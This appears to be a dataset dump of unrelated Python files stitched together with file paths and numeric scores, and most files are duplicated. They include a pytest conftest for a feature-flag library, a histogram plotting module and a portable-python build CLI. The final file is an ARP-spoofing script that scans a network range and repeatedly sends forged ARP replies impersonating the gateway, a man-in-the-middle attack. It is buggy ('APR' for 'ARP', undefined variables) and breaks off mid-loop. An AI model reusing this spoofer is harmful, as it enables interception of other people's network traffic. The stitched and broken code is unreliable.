parent_hooks = self.task_stack[-1]
self.workflow_engine.link_task(self.flow,
parent_hooks.on_prepare_begin,
child_hooks.on_prepare_begin)
self.workflow_engine.link_task(self.flow,
child_hooks.on_prepare_finish,
parent_hooks.on_prepare_finish)
self.workflow_engine.link_task(self.flow, child_hooks.on_complete,
parent_hooks.on_complete)
def build_resource_flow(operation_type, context, workflow_engine,
plugins, resource_graph, parameters):
LOG.info("Build resource flow for operation %s", operation_type)
resource_graph_flow = workflow_engine.build_flow(
'ResourceGraphFlow_{}'.format(operation_type),
'graph',
)
resource_walker = ResourceFlowGraphWalkerListener(resource_graph_flow,
operation_type,
context,
parameters,
plugins,
workflow_engine)
walker = graph.GraphWalker()
walker.register_listener(resource_walker)
LOG.debug("Starting resource graph walk (operation %s)", operation_type)
walker.walk_graph(resource_graph)
LOG.debug("Finished resource graph walk (operation %s)", operation_type)
return resource_graph_flow | 0.596903 | 0.159087 |
import os
import pytest
import sqlalchemy as sa
from webtest import TestApp as WebTestApp
from zope.interface import implementer
from zope.interface.verify import verifyObject
from ensign import BinaryFlag
from ensign._interfaces import IStorage
from ensign._storage import DefaultStorage
from ensign.api import main
@implementer(IStorage)
class FakeStorage:
"""
Fake storage class, to simulate a very simple datastore.
"""
def __init__(self):
self.STORE = {}
assert verifyObject(IStorage, self)
def create(self, name, flagtype, **kwargs):
"""
Create a new flag, with its value set to None.
"""
self.STORE[name] = dict(
name=name,
type=flagtype,
value_binary=None,
**kwargs,
)
def exists(self, name):
"""
Check if a flag exists.
"""
return name in self.STORE
def load(self, name, flagtype):
"""
Load a flag's value from the store, given its name.
"""
return self.STORE[name]["value_{}".format(flagtype.value)]
def store(self, name, value, flagtype):
"""
Store a flag's value to the store, given its name.
"""
self.STORE[name]["value_{}".format(flagtype.value)] = value
def used(self, name):
"""
Get a flag's last used datetime, given its name.
"""
return self.STORE[name].get("used")
def info(self, name):
"""
Return a flag's descriptive information.
"""
info = self.STORE[name]
return dict(
name=info.get("name"),
label=info.get("label", ""),
description=info.get("description", ""),
tags=info.get("tags", ""),
)
def all(self):
"""
Return all flags.
"""
return self.STORE.keys()
@pytest.fixture(scope="function")
def fakestore():
"""
Fixture providing a fake storage.
It's cleaned up for every test.
"""
return FakeStorage()
@pytest.fixture(scope="function")
def fakeflag(fakestore):
"""
Fixture providing a flag stored in fake storage.
It's generated anew for every test.
"""
return BinaryFlag.create("fakeflag", store=fakestore)
@pytest.fixture(scope="session")
def _pre_db():
"""
Fixture preparing the test database and establishing all the necessary
connections, and cleaning everything up when done.
The operations are performed just once per session.
"""
engine = sa.create_engine(os.environ.get("MGMT_DB"))
conn = engine.connect()
conn.execute("commit")
conn.execute("create database flags_test")
DefaultStorage.init_db()
yield
DefaultStorage.connection.close()
DefaultStorage.engine.dispose()
conn.execute("commit")
conn.execute("drop database flags_test")
conn.close()
engine.dispose()
@pytest.fixture(scope="function")
def db(_pre_db):
"""
Fixture providing access to a test database.
Transactions are rolled back for every test.
"""
conn = DefaultStorage.connection
trans = conn.begin()
yield
trans.rollback()
@pytest.fixture(scope="session")
def api():
"""
Fixture providing a WebTest-produced instance of the flags API.
"""
return WebTestApp(main({
"testing": True,
}))
def pytest_addoption(parser):
"""
Command line option to enable acceptance tests.
"""
parser.addoption(
"--specs",
action="store_true",
help="Run acceptance test suite",
)
def pytest_runtest_setup(item):
"""
If the --spec command line argument is passed, run only acceptance tests.
Otherwise, skip them.
"""
marker = item.get_closest_marker("spec")
if item.config.getoption("--specs"):
if marker is None:
pytest.skip()
else:
if marker is not None:
pytest.skip() | tests/conftest.py |
import os
import pytest
import sqlalchemy as sa
from webtest import TestApp as WebTestApp
from zope.interface import implementer
from zope.interface.verify import verifyObject
from ensign import BinaryFlag
from ensign._interfaces import IStorage
from ensign._storage import DefaultStorage
from ensign.api import main
@implementer(IStorage)
class FakeStorage:
"""
Fake storage class, to simulate a very simple datastore.
"""
def __init__(self):
self.STORE = {}
assert verifyObject(IStorage, self)
def create(self, name, flagtype, **kwargs):
"""
Create a new flag, with its value set to None.
"""
self.STORE[name] = dict(
name=name,
type=flagtype,
value_binary=None,
**kwargs,
)
def exists(self, name):
"""
Check if a flag exists.
"""
return name in self.STORE
def load(self, name, flagtype):
"""
Load a flag's value from the store, given its name.
"""
return self.STORE[name]["value_{}".format(flagtype.value)]
def store(self, name, value, flagtype):
"""
Store a flag's value to the store, given its name.
"""
self.STORE[name]["value_{}".format(flagtype.value)] = value
def used(self, name):
"""
Get a flag's last used datetime, given its name.
"""
return self.STORE[name].get("used")
def info(self, name):
"""
Return a flag's descriptive information.
"""
info = self.STORE[name]
return dict(
name=info.get("name"),
label=info.get("label", ""),
description=info.get("description", ""),
tags=info.get("tags", ""),
)
def all(self):
"""
Return all flags.
"""
return self.STORE.keys()
@pytest.fixture(scope="function")
def fakestore():
"""
Fixture providing a fake storage.
It's cleaned up for every test.
"""
return FakeStorage()
@pytest.fixture(scope="function")
def fakeflag(fakestore):
"""
Fixture providing a flag stored in fake storage.
It's generated anew for every test.
"""
return BinaryFlag.create("fakeflag", store=fakestore)
@pytest.fixture(scope="session")
def _pre_db():
"""
Fixture preparing the test database and establishing all the necessary
connections, and cleaning everything up when done.
The operations are performed just once per session.
"""
engine = sa.create_engine(os.environ.get("MGMT_DB"))
conn = engine.connect()
conn.execute("commit")
conn.execute("create database flags_test")
DefaultStorage.init_db()
yield
DefaultStorage.connection.close()
DefaultStorage.engine.dispose()
conn.execute("commit")
conn.execute("drop database flags_test")
conn.close()
engine.dispose()
@pytest.fixture(scope="function")
def db(_pre_db):
"""
Fixture providing access to a test database.
Transactions are rolled back for every test.
"""
conn = DefaultStorage.connection
trans = conn.begin()
yield
trans.rollback()
@pytest.fixture(scope="session")
def api():
"""
Fixture providing a WebTest-produced instance of the flags API.
"""
return WebTestApp(main({
"testing": True,
}))
def pytest_addoption(parser):
"""
Command line option to enable acceptance tests.
"""
parser.addoption(
"--specs",
action="store_true",
help="Run acceptance test suite",
)
def pytest_runtest_setup(item):
"""
If the --spec command line argument is passed, run only acceptance tests.
Otherwise, skip them.
"""
marker = item.get_closest_marker("spec")
if item.config.getoption("--specs"):
if marker is None:
pytest.skip()
else:
if marker is not None:
pytest.skip() | 0.641422 | 0.390185 |
from dataclasses import dataclass
import numpy as np
import matplotlib.pyplot as plt
import math
import seaborn as sns
from tarpan.shared.info_path import InfoPath, get_info_path
from tarpan.shared.summary import SummaryParams, sample_summary
from tarpan.shared.param_names import filter_param_names
@dataclass
class HistogramParams:
title: str = None # Plot's title
max_plot_pages: int = 4 # Maximum number of plots to generate.
num_plot_rows: int = 4 # Number of rows (subplots) in a plot.
ncols: int = 2 # Number of columns in the plot.
hist_color = "#00a6ff" # Fill color for histogram bars
hist_edge_color = "#FFFFFF" # Edge color for the histogram bars
# Colors and line styles for KDE lines of the error bars (HPDIs)
# Sorted from largerst smallest HPDI values
kde_colors = ['#FF9922', '#6666FF', '#44FF55']
kde_line_styles = ['dotted', 'solid', '-.']
def save_histogram(samples, param_names=None,
info_path=InfoPath(),
histogram_params=HistogramParams(),
summary_params=SummaryParams()):
"""
Make histograms for the parameters from posterior destribution.
Parameters
-----------
samples : Panda's DataFrame
Each column contains samples from posterior distribution.
param_names : list of str
Names of the parameters for plotting. If None, all will be plotted.
"""
info_path.set_codefile()
df_summary, table = sample_summary(df=samples)
save_histogram_from_summary(samples, df_summary,
param_names=param_names,
info_path=info_path,
histogram_params=histogram_params,
summary_params=summary_params)
def save_histogram_from_summary(samples, summary, param_names=None,
info_path=InfoPath(),
histogram_params=HistogramParams(),
summary_params=SummaryParams()):
"""
Make histograms for the parameters from posterior destribution.
Parameters
-----------
samples : Panda's DataFrame
Each column contains samples from posterior distribution.
summary : Panda's DataFrame
Summary information about each column.
param_names : list of str
Names of the parameters for plotting. If None, all will be plotted.
"""
info_path = InfoPath(**info_path.__dict__)
figures_and_axes = make_histograms(
samples, summary, param_names=param_names,
params=histogram_params,
summary_params=summary_params)
base_name = info_path.base_name or "histogram"
info_path.extension = info_path.extension or 'pdf'
for i, figure_and_axis in enumerate(figures_and_axes):
info_path.base_name = f'{base_name}_{i + 1:02d}'
plot_path = get_info_path(info_path)
fig = figure_and_axis[0]
fig.savefig(plot_path, dpi=info_path.dpi)
plt.close(fig)
def make_histogram_one_page(i_start, samples, summary, param_names,
params: HistogramParams,
summary_params=SummaryParams()):
"""
Make a single file with histograms for the parameters
from posterior destribution.
"""
nrows = math.ceil((len(param_names) - i_start) / params.ncols)
if nrows > params.num_plot_rows:
nrows = params.num_plot_rows
ncols = params.ncols
fig_height = 4 * nrows
fig_width = 12
# Special case: if there is just one parameter show a plot with one column
if len(param_names) == 1:
ncols = 1
fig_width /= 2
fig, ax = plt.subplots(
nrows=nrows,
ncols=ncols, figsize=(fig_width, fig_height),
squeeze=False)
axes = ax.flatten()
for i_axis, ax in enumerate(axes):
i_param = i_start + i_axis
if i_param >= len(param_names):
break
parameter = param_names[i_param]
param_samples = samples[parameter]
data = summary.loc[parameter]
# Exclude extreme outliers from the samples
# to avoid the blow-up of the x-axis range
inner_range = np.percentile(param_samples, [0.5, 99.5])
samples_for_kde = param_samples[(param_samples > inner_range[0])
& (param_samples < inner_range[1])]
sns.distplot(samples_for_kde, kde=False, norm_hist=True, ax=ax,
hist_kws={
"color": params.hist_color,
"zorder": 1,
"edgecolor": params.hist_edge_color,
"linewidth": 1,
"alpha": 1})
# Show KDEs for the error bars (HPDIs)
# -----------
hpdis = sorted(summary_params.hpdi_percent(), reverse=True)
for i, hpdi in enumerate(hpdis):
start = f'{hpdi}CI-'
end = f'{hpdi}CI+'
# KDE plot
sns.kdeplot(samples_for_kde, shade=False,
clip=[data[start], data[end]],
label=f'{hpdi}% HPDI', ax=ax, legend=None,
color=params.kde_colors[i],
linestyle=params.kde_line_styles[i],
linewidth=2)
if i == len(hpdis) - 1:
# Show shade under KDE for the last error bar
sns.kdeplot(samples_for_kde, shade=True,
clip=[data[start], data[end]],
color="#000000",
label='_nolegend_', alpha=0.2,
zorder=10,
ax=ax, legend=None,
linewidth=2)
ax.axvline(x=data['Mean'], label='Mean', linewidth=1.5,
linestyle='dashed', color='#33AA66')
ax.axvline(x=data['Mode'], label='Mode', linewidth=1.5,
color='#FF66AA')
ax.set_xlabel(parameter)
# Do not draw the axes for non-existing plots
for ax in axes[len(param_names):]:
ax.axis('off')
handles, labels = axes[0].get_legend_handles_labels()
fig.legend(handles, labels, loc='upper center', mode='expand',
ncol=len(labels))
fig.tight_layout(rect=[0, 0, 1, 0.95])
return (fig, ax)
def make_histograms(samples, summary, param_names=None,
params=HistogramParams(),
summary_params=SummaryParams()):
"""
Make multiple files with
histograms for the parameters from posterior destribution.
Parameters
-----------
samples : Panda's DataFrame
Each column contains samples from posterior distribution.
summary : Panda's DataFrame
Summary information about each column.
param_names : list of str
Names of the parameters for plotting. If None, all will be plotted.
"""
param_names = filter_param_names(samples.columns, param_names)
# Total number of plots
n_plots = math.ceil(math.ceil(len(param_names) / params.ncols) /
params.num_plot_rows)
if n_plots > params.max_plot_pages:
print((
f'Showing only first {params.max_plot_pages} '
f'pages out of {n_plots} of histogram.'
'Consider specifying "param_names".'))
n_plots = params.max_plot_pages
if n_plots < 1:
n_plots = 1
figures_and_axes = []
# Make multiple traceplots
for i_plot in range(n_plots):
fig, ax = make_histogram_one_page(
i_start=i_plot * params.num_plot_rows * params.ncols,
samples=samples,
summary=summary,
param_names=param_names,
params=params,
summary_params=summary_params)
figures_and_axes.append([fig, ax])
return figures_and_axes | tarpan/shared/histogram.py |
from dataclasses import dataclass
import numpy as np
import matplotlib.pyplot as plt
import math
import seaborn as sns
from tarpan.shared.info_path import InfoPath, get_info_path
from tarpan.shared.summary import SummaryParams, sample_summary
from tarpan.shared.param_names import filter_param_names
@dataclass
class HistogramParams:
title: str = None # Plot's title
max_plot_pages: int = 4 # Maximum number of plots to generate.
num_plot_rows: int = 4 # Number of rows (subplots) in a plot.
ncols: int = 2 # Number of columns in the plot.
hist_color = "#00a6ff" # Fill color for histogram bars
hist_edge_color = "#FFFFFF" # Edge color for the histogram bars
# Colors and line styles for KDE lines of the error bars (HPDIs)
# Sorted from largerst smallest HPDI values
kde_colors = ['#FF9922', '#6666FF', '#44FF55']
kde_line_styles = ['dotted', 'solid', '-.']
def save_histogram(samples, param_names=None,
info_path=InfoPath(),
histogram_params=HistogramParams(),
summary_params=SummaryParams()):
"""
Make histograms for the parameters from posterior destribution.
Parameters
-----------
samples : Panda's DataFrame
Each column contains samples from posterior distribution.
param_names : list of str
Names of the parameters for plotting. If None, all will be plotted.
"""
info_path.set_codefile()
df_summary, table = sample_summary(df=samples)
save_histogram_from_summary(samples, df_summary,
param_names=param_names,
info_path=info_path,
histogram_params=histogram_params,
summary_params=summary_params)
def save_histogram_from_summary(samples, summary, param_names=None,
info_path=InfoPath(),
histogram_params=HistogramParams(),
summary_params=SummaryParams()):
"""
Make histograms for the parameters from posterior destribution.
Parameters
-----------
samples : Panda's DataFrame
Each column contains samples from posterior distribution.
summary : Panda's DataFrame
Summary information about each column.
param_names : list of str
Names of the parameters for plotting. If None, all will be plotted.
"""
info_path = InfoPath(**info_path.__dict__)
figures_and_axes = make_histograms(
samples, summary, param_names=param_names,
params=histogram_params,
summary_params=summary_params)
base_name = info_path.base_name or "histogram"
info_path.extension = info_path.extension or 'pdf'
for i, figure_and_axis in enumerate(figures_and_axes):
info_path.base_name = f'{base_name}_{i + 1:02d}'
plot_path = get_info_path(info_path)
fig = figure_and_axis[0]
fig.savefig(plot_path, dpi=info_path.dpi)
plt.close(fig)
def make_histogram_one_page(i_start, samples, summary, param_names,
params: HistogramParams,
summary_params=SummaryParams()):
"""
Make a single file with histograms for the parameters
from posterior destribution.
"""
nrows = math.ceil((len(param_names) - i_start) / params.ncols)
if nrows > params.num_plot_rows:
nrows = params.num_plot_rows
ncols = params.ncols
fig_height = 4 * nrows
fig_width = 12
# Special case: if there is just one parameter show a plot with one column
if len(param_names) == 1:
ncols = 1
fig_width /= 2
fig, ax = plt.subplots(
nrows=nrows,
ncols=ncols, figsize=(fig_width, fig_height),
squeeze=False)
axes = ax.flatten()
for i_axis, ax in enumerate(axes):
i_param = i_start + i_axis
if i_param >= len(param_names):
break
parameter = param_names[i_param]
param_samples = samples[parameter]
data = summary.loc[parameter]
# Exclude extreme outliers from the samples
# to avoid the blow-up of the x-axis range
inner_range = np.percentile(param_samples, [0.5, 99.5])
samples_for_kde = param_samples[(param_samples > inner_range[0])
& (param_samples < inner_range[1])]
sns.distplot(samples_for_kde, kde=False, norm_hist=True, ax=ax,
hist_kws={
"color": params.hist_color,
"zorder": 1,
"edgecolor": params.hist_edge_color,
"linewidth": 1,
"alpha": 1})
# Show KDEs for the error bars (HPDIs)
# -----------
hpdis = sorted(summary_params.hpdi_percent(), reverse=True)
for i, hpdi in enumerate(hpdis):
start = f'{hpdi}CI-'
end = f'{hpdi}CI+'
# KDE plot
sns.kdeplot(samples_for_kde, shade=False,
clip=[data[start], data[end]],
label=f'{hpdi}% HPDI', ax=ax, legend=None,
color=params.kde_colors[i],
linestyle=params.kde_line_styles[i],
linewidth=2)
if i == len(hpdis) - 1:
# Show shade under KDE for the last error bar
sns.kdeplot(samples_for_kde, shade=True,
clip=[data[start], data[end]],
color="#000000",
label='_nolegend_', alpha=0.2,
zorder=10,
ax=ax, legend=None,
linewidth=2)
ax.axvline(x=data['Mean'], label='Mean', linewidth=1.5,
linestyle='dashed', color='#33AA66')
ax.axvline(x=data['Mode'], label='Mode', linewidth=1.5,
color='#FF66AA')
ax.set_xlabel(parameter)
# Do not draw the axes for non-existing plots
for ax in axes[len(param_names):]:
ax.axis('off')
handles, labels = axes[0].get_legend_handles_labels()
fig.legend(handles, labels, loc='upper center', mode='expand',
ncol=len(labels))
fig.tight_layout(rect=[0, 0, 1, 0.95])
return (fig, ax)
def make_histograms(samples, summary, param_names=None,
params=HistogramParams(),
summary_params=SummaryParams()):
"""
Make multiple files with
histograms for the parameters from posterior destribution.
Parameters
-----------
samples : Panda's DataFrame
Each column contains samples from posterior distribution.
summary : Panda's DataFrame
Summary information about each column.
param_names : list of str
Names of the parameters for plotting. If None, all will be plotted.
"""
param_names = filter_param_names(samples.columns, param_names)
# Total number of plots
n_plots = math.ceil(math.ceil(len(param_names) / params.ncols) /
params.num_plot_rows)
if n_plots > params.max_plot_pages:
print((
f'Showing only first {params.max_plot_pages} '
f'pages out of {n_plots} of histogram.'
'Consider specifying "param_names".'))
n_plots = params.max_plot_pages
if n_plots < 1:
n_plots = 1
figures_and_axes = []
# Make multiple traceplots
for i_plot in range(n_plots):
fig, ax = make_histogram_one_page(
i_start=i_plot * params.num_plot_rows * params.ncols,
samples=samples,
summary=summary,
param_names=param_names,
params=params,
summary_params=summary_params)
figures_and_axes.append([fig, ax])
return figures_and_axes | 0.873822 | 0.620162 |
import logging
import click
import runez
from runez.pyenv import PythonDepot, PythonSpec
from runez.render import PrettyTable
from portable_python import BuildSetup, PPG
from portable_python.inspector import LibAutoCorrect, PythonInspector
LOG = logging.getLogger(__name__)
@runez.click.group()
@runez.click.version()
@runez.click.color()
@runez.click.debug("-v")
@runez.click.dryrun("-n")
@click.option("--config", "-c", metavar="PATH", default="portable-python.yml", show_default=True, help="Path to config file to use")
@click.option("--target", "-t", hidden=True, help="For internal use / testing")
def main(debug, config, target):
"""
Build (optionally portable) python binaries
"""
runez.system.AbortException = SystemExit
runez.log.setup(
debug=debug,
console_format="%(levelname)s %(message)s",
console_level=logging.INFO,
default_logger=LOG.info,
locations=None,
)
PPG.grab_config(config, target=target)
@main.command()
@click.option("--modules", "-m", metavar="CSV", help="External modules to include")
@click.option("--prefix", "-p", metavar="PATH", help="Use given --prefix for python installation (not portable)")
@click.argument("python_spec")
def build(modules, prefix, python_spec):
"""Build a portable python binary"""
setup = BuildSetup(python_spec, modules=modules, prefix=prefix)
setup.compile()
@main.command()
@click.option("--modules", "-m", metavar="CSV", help="External modules to include")
@click.argument("python_spec", required=False)
def build_report(modules, python_spec):
"""Show status of buildable modules, which will be auto-compiled"""
setup = BuildSetup(python_spec, modules=modules)
print(runez.bold(setup.python_spec))
report = setup.python_builder.modules.report()
print(report)
setup.validate_module_selection()
@main.command()
def diagnostics():
"""Show diagnostics info"""
with runez.Anchored("."):
depot = PythonDepot(use_path=True)
depot.scan_path_env_var()
def _diagnostics():
yield "invoker python", depot.invoker
yield from runez.SYS_INFO.diagnostics()
config = PPG.config.represented()
print(PrettyTable.two_column_diagnostics(_diagnostics(), depot.representation(), config))
@main.command()
@click.option("--modules", "-m", help="Modules to inspect")
@click.option("--verbose", "-v", is_flag=True, help="Show full so report")
@click.option("--prefix", "-p", is_flag=True, help="Build was done with --prefix (not portable)")
@click.argument("path")
def inspect(modules, verbose, prefix, path):
"""Inspect a python installation for non-portable dynamic lib usage"""
if path != "invoker":
path = runez.resolved_path(path)
inspector = PythonInspector(path, modules=modules)
runez.abort_if(inspector.python.problem, "%s: %s" % (runez.red(path), inspector.python.problem))
print(runez.blue(inspector.python))
print(inspector.represented(verbose=verbose))
if not modules or modules == "all":
problem = inspector.full_so_report.get_problem(portable=not prefix)
runez.abort_if(problem)
@main.command(name="list")
@click.option("--json", is_flag=True, help="Json output")
@click.argument("family", default="cpython")
def list_cmd(json, family):
"""List latest versions"""
fam = PPG.family(family, fatal=False)
if not fam:
runez.abort("Python family '%s' is not yet supported" % runez.red(family))
if json:
print(runez.represented_json(fam.available_versions))
return
print("%s:" % runez.bold(family))
for mm, v in fam.available_versions.items():
print(" %s: %s" % (runez.bold(mm), v))
def _find_recompress_source(folders, path):
candidate = runez.to_path(path)
if candidate.exists() or candidate.is_absolute():
return candidate.absolute() if candidate.exists() else None
candidates = [folders.base_folder, folders.build_folder, folders.dist, folders.destdir]
for candidate in candidates:
if candidate:
candidate = runez.to_path(candidate) / path
if candidate.exists():
return candidate.absolute()
@runez.log.timeit
def recompress_folder(folders, path, extension):
"""Recompress folder"""
dest = runez.SYS_INFO.platform_id.composed_basename("cpython", path.name, extension=extension)
dest = folders.dist / dest
runez.compress(path, dest, logger=print)
return dest
@runez.log.timeit
def recompress_archive(folders, path, extension):
stem = path.name.rpartition(".")[0]
if stem.endswith(".tar"):
stem = stem.rpartition(".")[0]
dest = "%s.%s" % (stem, extension)
dest = folders.dist / dest
if dest == path:
dest = "%s.%s" % (stem + "-recompressed", extension)
dest = folders.dist / dest
with runez.TempFolder() as _:
tmp_folder = runez.to_path("tmp")
runez.decompress(path, tmp_folder, simplify=True, logger=print)
runez.compress(tmp_folder, dest.name, arcname=dest.name, logger=print)
runez.move(dest.name, dest, logger=print)
return dest
@main.command()
@click.argument("path", required=True)
@click.argument("ext", required=True, type=click.Choice(runez.SYS_INFO.platform_id.supported_compression))
def recompress(path, ext):
"""
Re-compress an existing binary tarball, or folder
\b
Mildly useful for comparing sizes from different compressions
"""
extension = runez.SYS_INFO.platform_id.canonical_compress_extension(ext)
pspec = PythonSpec.to_spec(path)
folders = PPG.get_folders(base=".", family=pspec and pspec.family, version=pspec and pspec.version)
with runez.Anchored(folders.base_folder):
actual_path = _find_recompress_source(folders, path)
if not actual_path:
runez.abort("'%s' does not exist" % runez.red(runez.short(path)))
if actual_path.is_dir():
dest = recompress_folder(folders, actual_path, extension)
else:
dest = recompress_archive(folders, actual_path, extension)
print("Size of %s: %s" % (runez.short(actual_path), runez.bold(runez.represented_bytesize(actual_path))))
print("Size of %s: %s" % (runez.short(dest), runez.bold(runez.represented_bytesize(dest))))
@main.command()
@click.option("--commit", is_flag=True, help="Effectively perform the changes")
@click.option("--prefix", "-p", metavar="PATH", help="--prefix the program was built with (default: same as scanned path)")
@click.argument("path", required=True)
def lib_auto_correct(commit, prefix, path):
"""
Scan a python installation, auto-correct exes/libraries to use relative paths
This is mostly for testing purposes, applies the same method done internally by this tool.
Allows to exercise just the lib-auto-correct part without having to wait for full build to complete.
"""
if not runez.DRYRUN:
runez.log.set_dryrun(not commit)
path = runez.resolved_path(path)
if not prefix:
python = PPG.find_python(path)
runez.abort_if(python.problem)
r = runez.run(python.executable, "-c", "import sysconfig; print(sysconfig.get_config_var('prefix'))", dryrun=False)
prefix = runez.resolved_path(r.output)
lib_auto_correct = LibAutoCorrect(prefix, runez.to_path(path))
lib_auto_correct.run()
if __name__ == "__main__":
from portable_python.cli import main # noqa, re-import with proper package
main() | src/portable_python/cli.py | import logging
import click
import runez
from runez.pyenv import PythonDepot, PythonSpec
from runez.render import PrettyTable
from portable_python import BuildSetup, PPG
from portable_python.inspector import LibAutoCorrect, PythonInspector
LOG = logging.getLogger(__name__)
@runez.click.group()
@runez.click.version()
@runez.click.color()
@runez.click.debug("-v")
@runez.click.dryrun("-n")
@click.option("--config", "-c", metavar="PATH", default="portable-python.yml", show_default=True, help="Path to config file to use")
@click.option("--target", "-t", hidden=True, help="For internal use / testing")
def main(debug, config, target):
"""
Build (optionally portable) python binaries
"""
runez.system.AbortException = SystemExit
runez.log.setup(
debug=debug,
console_format="%(levelname)s %(message)s",
console_level=logging.INFO,
default_logger=LOG.info,
locations=None,
)
PPG.grab_config(config, target=target)
@main.command()
@click.option("--modules", "-m", metavar="CSV", help="External modules to include")
@click.option("--prefix", "-p", metavar="PATH", help="Use given --prefix for python installation (not portable)")
@click.argument("python_spec")
def build(modules, prefix, python_spec):
"""Build a portable python binary"""
setup = BuildSetup(python_spec, modules=modules, prefix=prefix)
setup.compile()
@main.command()
@click.option("--modules", "-m", metavar="CSV", help="External modules to include")
@click.argument("python_spec", required=False)
def build_report(modules, python_spec):
"""Show status of buildable modules, which will be auto-compiled"""
setup = BuildSetup(python_spec, modules=modules)
print(runez.bold(setup.python_spec))
report = setup.python_builder.modules.report()
print(report)
setup.validate_module_selection()
@main.command()
def diagnostics():
"""Show diagnostics info"""
with runez.Anchored("."):
depot = PythonDepot(use_path=True)
depot.scan_path_env_var()
def _diagnostics():
yield "invoker python", depot.invoker
yield from runez.SYS_INFO.diagnostics()
config = PPG.config.represented()
print(PrettyTable.two_column_diagnostics(_diagnostics(), depot.representation(), config))
@main.command()
@click.option("--modules", "-m", help="Modules to inspect")
@click.option("--verbose", "-v", is_flag=True, help="Show full so report")
@click.option("--prefix", "-p", is_flag=True, help="Build was done with --prefix (not portable)")
@click.argument("path")
def inspect(modules, verbose, prefix, path):
"""Inspect a python installation for non-portable dynamic lib usage"""
if path != "invoker":
path = runez.resolved_path(path)
inspector = PythonInspector(path, modules=modules)
runez.abort_if(inspector.python.problem, "%s: %s" % (runez.red(path), inspector.python.problem))
print(runez.blue(inspector.python))
print(inspector.represented(verbose=verbose))
if not modules or modules == "all":
problem = inspector.full_so_report.get_problem(portable=not prefix)
runez.abort_if(problem)
@main.command(name="list")
@click.option("--json", is_flag=True, help="Json output")
@click.argument("family", default="cpython")
def list_cmd(json, family):
"""List latest versions"""
fam = PPG.family(family, fatal=False)
if not fam:
runez.abort("Python family '%s' is not yet supported" % runez.red(family))
if json:
print(runez.represented_json(fam.available_versions))
return
print("%s:" % runez.bold(family))
for mm, v in fam.available_versions.items():
print(" %s: %s" % (runez.bold(mm), v))
def _find_recompress_source(folders, path):
candidate = runez.to_path(path)
if candidate.exists() or candidate.is_absolute():
return candidate.absolute() if candidate.exists() else None
candidates = [folders.base_folder, folders.build_folder, folders.dist, folders.destdir]
for candidate in candidates:
if candidate:
candidate = runez.to_path(candidate) / path
if candidate.exists():
return candidate.absolute()
@runez.log.timeit
def recompress_folder(folders, path, extension):
"""Recompress folder"""
dest = runez.SYS_INFO.platform_id.composed_basename("cpython", path.name, extension=extension)
dest = folders.dist / dest
runez.compress(path, dest, logger=print)
return dest
@runez.log.timeit
def recompress_archive(folders, path, extension):
stem = path.name.rpartition(".")[0]
if stem.endswith(".tar"):
stem = stem.rpartition(".")[0]
dest = "%s.%s" % (stem, extension)
dest = folders.dist / dest
if dest == path:
dest = "%s.%s" % (stem + "-recompressed", extension)
dest = folders.dist / dest
with runez.TempFolder() as _:
tmp_folder = runez.to_path("tmp")
runez.decompress(path, tmp_folder, simplify=True, logger=print)
runez.compress(tmp_folder, dest.name, arcname=dest.name, logger=print)
runez.move(dest.name, dest, logger=print)
return dest
@main.command()
@click.argument("path", required=True)
@click.argument("ext", required=True, type=click.Choice(runez.SYS_INFO.platform_id.supported_compression))
def recompress(path, ext):
"""
Re-compress an existing binary tarball, or folder
\b
Mildly useful for comparing sizes from different compressions
"""
extension = runez.SYS_INFO.platform_id.canonical_compress_extension(ext)
pspec = PythonSpec.to_spec(path)
folders = PPG.get_folders(base=".", family=pspec and pspec.family, version=pspec and pspec.version)
with runez.Anchored(folders.base_folder):
actual_path = _find_recompress_source(folders, path)
if not actual_path:
runez.abort("'%s' does not exist" % runez.red(runez.short(path)))
if actual_path.is_dir():
dest = recompress_folder(folders, actual_path, extension)
else:
dest = recompress_archive(folders, actual_path, extension)
print("Size of %s: %s" % (runez.short(actual_path), runez.bold(runez.represented_bytesize(actual_path))))
print("Size of %s: %s" % (runez.short(dest), runez.bold(runez.represented_bytesize(dest))))
@main.command()
@click.option("--commit", is_flag=True, help="Effectively perform the changes")
@click.option("--prefix", "-p", metavar="PATH", help="--prefix the program was built with (default: same as scanned path)")
@click.argument("path", required=True)
def lib_auto_correct(commit, prefix, path):
"""
Scan a python installation, auto-correct exes/libraries to use relative paths
This is mostly for testing purposes, applies the same method done internally by this tool.
Allows to exercise just the lib-auto-correct part without having to wait for full build to complete.
"""
if not runez.DRYRUN:
runez.log.set_dryrun(not commit)
path = runez.resolved_path(path)
if not prefix:
python = PPG.find_python(path)
runez.abort_if(python.problem)
r = runez.run(python.executable, "-c", "import sysconfig; print(sysconfig.get_config_var('prefix'))", dryrun=False)
prefix = runez.resolved_path(r.output)
lib_auto_correct = LibAutoCorrect(prefix, runez.to_path(path))
lib_auto_correct.run()
if __name__ == "__main__":
from portable_python.cli import main # noqa, re-import with proper package
main() | 0.382603 | 0.089137 |
from scapy.all import *
from colorama import Fore, init
import argparse
import sys
init()
parse = argparse.ArgumentParser()
parse.add_argument("-r","--range",help="Range to scan or spoof")
parse.add_argument("-g","--gateway",help="Gatewat")
parse = parse.parse_args()
def get_mac(gateway):
arp_layer = ARP(pdst=gateway)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
final_packet = broadcast/arp_layer
mac = srp(final_packet, timeout=2, verbose=False)[0]
mac = mac[0][1].hwsrc
return mac
def scanner(_range,gateway):
list_hosts = dict()
arp_layer = ARP(pdst=_range)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
final_packet = broadcast/arp_layer
answers = srp(final_packet, timeout=2, verbose=False)[0]
print("\n")
for a in answers:
if a != gateway:
print(
"[{}+{} HOST: {} MAC: {}]".format(Fore.LIGHTGREEN_EX, Fore.LIGHTWHITE_EX, a[1].psrc, a[1].hwsrc)
)
list_hosts.update({a[1].psrc: a[1].hwsrc})
return list_hosts
def restore_arp(destip,sourceip,hwsrc,hwdst):
dest_mac = hwdst
source_mac = hwsrc
packet = APR(op=2, pdst=destip, hwdst=dest_mac, psrc=sourceip, hwsrc=source_mac)
send(packet, verbose=False)
def arp_spoof(hwdst, pdst,spsrc):
spoofer_packet = APR(op=2, hwdst=hwdst, pdst=pdst, psrc=pscr)
send(spoofer_packet, verbose=False)
def main():
if parse.range and parse.gateway:
mac_gateway = get_mac(parse.gateway)
print(mac_gateway)
hosts = scanner(parse.range, parse.gateway)
try:
print("\n[{}+{} RUNNING...]",format(Fore.LIGHTGREEN_EX, Fore.LIGHTWHITE_EX))
while True:
for n in hosts:
mac_target = hosts[n]
ip_target = n
gatway = parse.gateway
arp_spoof(mac_gateway,gateway,ip_target)
